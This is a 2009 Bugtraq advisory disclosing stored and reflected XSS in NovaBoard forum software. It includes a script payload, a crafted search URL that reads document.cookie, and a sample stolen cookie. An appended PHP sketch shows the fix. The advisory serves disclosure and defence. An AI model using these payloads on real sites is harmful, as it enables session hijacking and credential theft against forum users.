NovaBoard <= 1.0.1 / XSS Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: NovaBoard <= 1.0.1 / XSS Vulnerability
- From: Jose Luis <pepeluxx@xxxxxxxxx>
- Date: Tue, 3 Mar 2009 22:26:33 +0100
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
NovaBoard <= 1.0.1 / XSS Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$ Program: NovaBoard
$ Version: <= 1.0.1
$ File affected: index.php
$ Download: http://www.novaboard.net/
Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org
-- About the program (from the author's page) --
NovaBoard is a free, feature rich community message board software written in
PHP & MySQL that allows you to set up your own forum within minutes.
With a smart modules feature and the ease of creating your own themes you can
style and manipulate your board to look and perform how you want.
NovaBoard makes running a message board a breeze!
-- Bug --
You can inject JS.
-- Exploit --
Persistent XSS:
You can write a message to another user of the forum and inject XSS code:
Message subject:
Message recipient:
Message:
<script>alert(document.cookie)</script>
You can also send the user's cookie to another site.
Non-persistent XSS:
http://site.com/index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic=
Response:
If you are an authenticated user you'll see something like this:
PHPSESSID=241092c53c1379df01b743d910f61c62; nova_name=Member;
nova_password=f11d8a080797894ad3e714fa2f849c62
Username and password are stored in the cookie.
If you are not authenticated:
PHPSESSID=241092c53c1379df01b743d910f61c62
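
A defensive sketch of the fix for both issues above, added here as an example and not taken from NovaBoard's code or from the advisory's author; all function names and markup are hypothetical. It assumes the search term is echoed into an input's value attribute (as the `">` prefix in the URL suggests) and shows output encoding plus an HttpOnly session cookie so script cannot read it through document.cookie.

```php
<?php
// Added example, not NovaBoard code: function names and markup are hypothetical.

// Vulnerable pattern: request data is concatenated into HTML unencoded.
function search_field_vulnerable(string $term): string
{
    return '<input type="text" name="search" value="' . $term . '">';
}

// Hardened: encode for the HTML context. ENT_QUOTES covers both quote
// styles, so the value cannot close the attribute or open a new tag.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function search_field_safe(string $term): string
{
    return '<input type="text" name="search" value="' . h($term) . '">';
}

// Stored private messages need the same encoding at render time.
function message_body_safe(string $body): string
{
    return '<div class="pm-body">' . nl2br(h($body)) . '</div>';
}

// Session cookie options (PHP >= 7.3): HttpOnly hides the cookie from
// document.cookie. Keep only a random session ID in cookies, never a
// username or password hash.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,      // assumes the board is served over HTTPS
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Constructed input: the decoded `search` value from the advisory's URL.
$payload = '"><script>alert(document.cookie)</script>';
if (PHP_SAPI === 'cli') {
    echo search_field_vulnerable($payload), "\n"; // markup breaks out of value=""
    echo search_field_safe($payload), "\n";       // rendered as inert text
    echo message_body_safe($payload), "\n";
}
```

Run with the PHP CLI to compare the three outputs; only the first contains a live script element.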